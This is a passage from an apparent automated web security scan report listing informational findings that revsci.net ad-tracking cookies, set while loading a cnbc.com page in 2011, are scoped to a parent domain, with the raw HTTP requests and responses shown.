rsi_us_1000000="pUM14y+nMBYULQEQOwk1lMZKgvM/u/LBmb++8q/ndaQD3MFOwlNzUAn9GLtouXUM0bq7wUUdjx2/kl5WmoT0C6tmoYCWvDarELVcDWPiUOeyT+dO+pdp/M4NeSHp/4tukTiyqjNopjNtmBye7GI6YUKvBMWMRdr+TxdIoofPPvVOMaCbqRJib+HyDb1ZZEhOvr3RbQ4WsG4JHxL0HewfeLWrmdencXY98DyPLiRaafh+mNElnLGqy/4OffWnSG8N68cESgyHdFvLvrICVdxHlKRqPH02OKsM60SXNMYCSL0uvAYhbvnS0ItH0xAcOTHFVXp8Ma0OcnYdWvdwDiP703lI414tYrNx1bgOfWRYkZuQuc1HmJc1WwVKPwDAiKOjMB80jRXfi0Cx1cPbbNWluNdnBQd7OZmXLw4DmQcTWbjguj/Ibs0FUN9DuC9+YRpuQTaXIkFAHv0WmGWwD6Qyw0dFLRUMAp85K4gsPiMlQlQiLV8i8vQz0bIv2VeqjA+L/jHnFNwrQaNwkKv3rnbbIYcPGxXqkQmD1xxtWqqf4Kduj7SFKAaUtJAgnKQSn2CwSfK0Zkzl1TVOsJ+ltaLKRUpinGVh1edEsMXATSTy3prFzIQJv5JRuVvoZ8blUnzzOAiLTuFYe3qN+Jb6/GxXSef5pWelDGijTVaRHuy0QJFyrCsKL9Q83TjlKC9GP4HtESDDI3vySRbsYe1QSGrdAGfAdqZSVkoDg6uVQY8/KxXOKL2hpsILDs64gKD5avDgwwR/VPPIEm5relfKA3GMDZtDb4+SMroNJvXpFiL58v/xhLqFM7RAEjcs1NkQ/Y5wouTcCh1PoNUiPkiQaqlmCo8ukeuKEOUiG9C/ulQz83XRT9eOEJFZ5qVgbDTCi5ClaG6NddrdePczDEkEIQQrQruy+5krGRZB1bA0+nWAQM0ZZgV6Tad9twXGB3SnvUCnc2vk+EljhOpuPLi1TAS1KBsV3uwIh89zXPV+aQyighM6eTUyxiiRuQVvkZNJ5Hy4PouFYUgNIdsIDD/mb4zzory8r932G0otA2pJjhvSD7KJSrGlmUJ3Wn3snRElfNRAO3xG6M4YRfJViqGOkD041JXIX7OA0aV4QrN5CAJCh9GyHku9ZzHgecwn0BHpD557ljjADrIp4YbJsHANOrS4xQUzzPsx1dYk5e+QOV6mPAb3Iu1MqV3EkpcUoIvaraz5ROhKPp2t627xTNxXNGZ9zuU199SxtoNCQtMLXrvP+jorYhG37DGPAm1Y6Czx/p8UIiw+s0CCRmfNFoK0HLx5/oM3m1E/avgMhI4P3AQqyto01UOxfcnAM4EwlKq5/hip46IVqViWlbGE7P5PCBHOAABpyFh6j76g57HPEIC/6nVm9rDmn3/QyceKq4LMKYyoIsnTzB/NWAjjx0VzdFya082r+ZD+hPlH2TuW6HJwPEbCo01Re1Ia0Z4okFUivhFWFPkeND7bS6lg54LBLPFDhXAVOvomNpZtrIDX1qzrjJjfHz/c+8eRovftCCHMPaIsLI9Yu7kQP4fofcltHXsXirk7/Tcpv0aRCz3mwuhROlclUNVs3kC1J0N8ht4R2VqbshUHbVDqRZwh0CtSxDblVSfDYA+TC9cE2tc/70I9nBOJlGMVBkW2xqx0WmXGShI5avmm3SE8kL2nFDeq+4ZlAzf0PdVlJ4YsTtiN/Ku+OuVuoTPZNGvX6Hk7hQ7vnAlOHm9AU5+VIS5F0OLdHP19zirq5M6lAK7pIIVeCZ/E6P88KSTWLJ/6UbxjWK6VgViEVXt164I="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILcczr1Or9LgA8yBeRQriaiQb79ZzejppEzt2vRL2U1EkkmBKsPwD9zcgo4NlL4ewjjpZqPJL8Vd4A5alAwL6WHmVZDAvAlHNa/ilc0yBn1yuzryJwTO0rcGIVUOhddCJ3ZjcBrg7hztf1TvTm6t7yq2hVkZ7u/gbje6n7j1oFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRjpph0jIkaE2ihTZ1EWU0vpLSFy6hYxRi9kT0nVw0G9iNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMn2j4dIePr7B6ylMielihtHMj4PH19L1WPbI6B5vhMs6HbnIYcPx43tgk7tyNv/CzYfV5FqstcqOop1zqPFXKfXvvmEm0NN7M6M9909gJersEqbws/ZDBnp4g3ZVklyBZNtqf05W2rfLwB6MSKTCxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8x3HAB03EhK8Q3gpuZ0FUT1jb5xgJ0/NQhFabP01; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:26:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:26:20 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.152. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/400010602.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//Gh2ELDbiIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBhbIQWRbm/5UVa9Cw8fcNBVhR2lbzCJpIqOW4sghTvbDbBz9w+weHTb8dgLarwU7hjL6yZdj93XkHvxvY5dXdsfw5hXREUnkNjw66X24IlHVenCkA0wjuOXTVFAOz1Gl4fXOdq1W69ZZcRIuKAboUiXAD/EtZJ5YLXLgyxsX6W69GAwwtSJ9hgyenr+hJRydFoXdFjl95IfGM461SpFeWeZrGATDQl+wtAlabX/i5kyatsFIy6hwkvyKA++ydZDLH2HoeOShYLAYudmoWVQDRzO+hVnb6RNLwyVa3DArJ33H9VFqvQFjzcY4RlI0EdqpclJQm3k9fdW3mTUe+f0892J2acHgDf/VLKbYQckiar8IaWRIXSW63/UTu+4l45BtmrY1KtcHSQw0cLtwnCnp3H2FRAAywZQt02HPQELVT7zHIxqAwb0w5rLZRZFv572OyO3tlbUSIhYgOcVdvfLBNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:09:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/400010602.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rsiPus_X4PT="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/kuahp71BIcXCRw70aR2FbQZphz9qM0BoSXNrnSUtb1vwmbJzUt+6liEIkN8nrWWX49PmkZWW1AQyxTat59DoRy7H510PzwzMCk8K7PkuBlggz7RRjnYHQk9yPFNSPuFYXD8+of9pW1gadqZsPy/lCP1mb/hB/5tab3fYk/S9QZde8Ke7UP4ikGZj04cgy9BdGB4HvVZsX2bc1yza6KvITnWWE0HZ+7cN8Jg1NCiwz8jl32gMXb6N/qI4VuOKXe3FZo24PpviVIPNr/ssKopzQ22+/8RAsNVCe6i5Wf7DFjwcgNPCHpLt4mAAfXOeHuEdpCzKR8WFlj1xgVgZUU+INSvS2z6te5yoeNUw4HRiUrYCKxH73Eg6MA7Er36fSX5enLNSdiTZ1KP5bLMuXSGVdFE6t1EYHrYwDofZ4Gi5DZXZxPgW+sJoRtfvcDqKsgC9l+IsJB7nNduwyA3I1YTpITizOmgtt5MrPfVmPJdn7gKUf+jHWbBJ5GMLjEME3bXGAdEZRxgn2OCBUl+atoejo4T2cDgLXZC69WmDUxvRetZUISrW53APFNqsXT76F3wLTA7rse1TepIQ3K5Sr9Dz24nTjbgFmWDBZawbGpcVus1bCBG7jJ2QHy71TvrwBwjQnv/tmyup8hmB9BqVRtTgK4O6IFG99CpVYeRoLgpYotP2qbzIW2rKhml7nZh14t4sjTGGCNJbIJzypI8nENGPQ6yRPH5it9BZvmUu1r8mBYVTM/xg/zf8Yv+Na+2v4H9K1yamEkfjZiqon9otsk4n4jc1hB4qu7q/fYhEV2hIj5XXi7GJ28bmT+GLIwPMItkEKGQU48qq1SxMeq98BqICBam8UD01Awv5x02auQlEjMMskib5v2siqNZQGnKAjyF0RA4bzFQrmJLVb8f3sCgDULdPpklc4Wu4ByeEMyDeboQjr7oIU/lnJmPFhTfO+4g84CiB0cuCF0h6DlFjDyreTCppkxsHoBbRca0d/Md49KTI025El8ssgsHXfa+d8wp3Pai72i6aSBzqjUtcgTjzlp+L839gXv12f3OdbmZjw5puQDg8IF5dFJxhJCyX4wuOINPJuFk+MYvGpWy+BM5zYVAgnYZROsMFxNAxbLsdowJ8wLiFlce7Pzc6DlB2NoAbzsgQUFc7mjOiQLSd6fj8EuyhEsCvF4+XSllVtkU/mIjhmGg6WKAwY9UaugjDrXuwns1iAx7xSW50kkCNX+Z48cNoKLLTFVxyG5Pa3nmUCAgMLJ8pjOpE12Gzi9zbmV+prWKPMYNG1IAMWdZaZJdenltGUDJmTreWyrSHOc8Ss"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZCz2jywJqL21DklO4FpqrW4mts2r3+iyqdBm+PLbybIfPRXAGyAWqGaUcN76Ja1qAOTDE6FHSoqvcSTZGmsjHtyxiXTlK6880FLG12A2PlULpyvcZq9IqvpxPKk0YhA04L1Nso5MmhH0E/wCH/Y1ZbonZH/Q/zyE8fVAttnFQDh4QDENSCazWB7wm3+nvmKOwFtWi3KgcXOk7dGFHTPtbI66KrO68kGZE+JkCfFVU7Wqivfeaa/8/Ww7TBQ+iOcjF+lqvdirOi3uZTKpcnbwP0nJnsijbA/cJS8z7XZpW5E27Q8oHruI+D7xiQrYDXrgYCt7vxjlWiD0C7R3piUSf/X68aLEy3FTmG/xOMAoB69ZpMVfVMOaN8xjaZmZFCuwIv05D/jAgdQfdSrSmgeY3750+Elemimcf/YgmUWbQpxY7id5ZJJ/FFJQsHUDwMmERm6coNPtUyGm08BdzFgPwI9sbosRdU4r9N9j4TnpUeokHF6xcBZRYaZkG8qTxG8I12emFJrmxBR4NJ+W5TBRQe9U9DTLImPJYPfR3BLLiZYLilbS32aQRVgM8hJbchNHF6yxAQDjqs5OAeW4vOXuvZwdsE/K0lW9oBAqJFUcvLnRUwoQ2/ML+NNsg6RISCSZKfgaFhonxnPCMNGtDpEq7GNli8jPrAZpLu9+9GnQ+hIX7yDJyTyNBdW9hYD78/mMXUcU0HkaTIs97gbz9eg6hyf3N94xERrzR3hZyQkDwdrDAWoVu3JcVZyqjA5Zhbyyxuw/Y9SzAwKuqU19w6EJGhSq8Pu1tgCRPhNO5FjqkCWCJ98OL5THufKBvYnngdSuYaipEf4pMXCZ3OOlSxYrP5FpDjeneIOCGt7in7P8m0dCTolKOUZ0Mc9bxREjWOPJCjTwZj090ZkwYL3v7SvSv5Hon88wynPgObfg6+sER2sFWLhHDfP2e99VhGrbSIRfNiEsbBEHHHmxxaDa6WKZOLPUFzDUy29I12O54XpGU6gKaAV4YZ/sppgmz5E8F6pVBfe166LxmHw6AwbOqagxZNAf6IRrmdtyS5tC4RD/jw4JSD3ddVqC1sR2BJLzWZmzcbk3mUs4/A261dO2RDS/8af3Ia6pcILnfVsN1XR1RWKZHVOLUu7dxhypMOKdV7TAWMbtxK6TwEPNT4UVMOgMps2kKKazsKGdmJPVsNbziG5AQCdWcKvR685TAqy1capdei3AOkD55LYQ/qwiWwHzbplal55Tk5WTpo9RFgh2aJ2NZP6vmM3mJ7JYW5txoE6vdwdARHIqwcHrn5ZUEvCUgqY4NLPWV/9rNyqFar6I/aqh56ic5y+C7VLauAtS/xPO0/it6HQW2BKNu07L2qr0vgLooN3ZwsdDhJt0gbz0PzywZzDhtIx6bu4RRQTi/Q6rWVRapJcvuixV+Z6RmY+G0tOarFkBLC25o7k6G9Ey3ohXcKDMtUfky6FGfBdTi7PaDVFUHGLWRTn/AmwGe+NW5ymLXUh0/OSxD9ToW35VGT3kb58lKhqt8k/d4hqeTtUo1lmLzm4vntzE1N8mNzD7FuICvy5VJclYbydw1TC9cDxtcH70JZPCxubJDJt+BiSkqoEhJfPre0sbS9ImjLKXlW7Rf6AF4l05YBcSS88ZdgC8D6DXjVl73lOD7oOLmdpbV8hYDrdrM0zWvbG+6Esd/bXEZVN3QqDbihQq3NMq12tk+nHOm4Z4O6wqYFGZ/PHWfMapZf5Tql4iE="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7/PfE/3lutQJZXy2qdkzqazjnmg1GR1RfiQtXbs6UGwnW98N04s7gDWq+P0892J2acHgDV7VLKbYQckiar8IaWRIPZ0zFN9N+maUnu/7w3rzFV2GWZA8yYqZYNSgUGOjd45YSmYQE/BtCtK4hwOpWGB2w8OKPLDajNdOOelII4k5ZAYL7SmpB6lcs9wlNMY=; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//Gh2ELDbiIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBhbIQWRbm/5UVa9Cw8fcNBVhR2lbzCJpIqOW4sghTvbDbBz9w+weHTb8dgLarwU7hjL6yZdj93XkHvxvY5dXdsfw5hXREUnkNjw66X24IlHVenCkA0wjuOXTVFAOz1Gl4fXOdq1W69ZZcRIuKAboUiXAD/EtZJ5YLXLgyxsX6W69GAwwtSJ9hgyenr+hJRydFoXdFjl95IfGM461SpFeWeZrGATDQl+wtAlabX/i5kyatsFIy6hwkvyKA++ydZDLH2HoeOShYLAYudmoWVQDRzO+hVnb6RNLwyVa3DArJ33H9VFqvQFjzcY4RlI0EdqpclJQm3k9fdW3mTUe+f0892J2acHgDf/VLKbYQckiar8IaWRIXSW63/UTu+4l45BtmrY1KtcHSQw0cLtwnCnp3H2FRAAywZQt02HPQELVT7zHIxqAwb0w5rLZRZFv572OyO3tlbUSIhYgOcVdvfLBNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:09:05 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:09:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.153. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/4030732.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

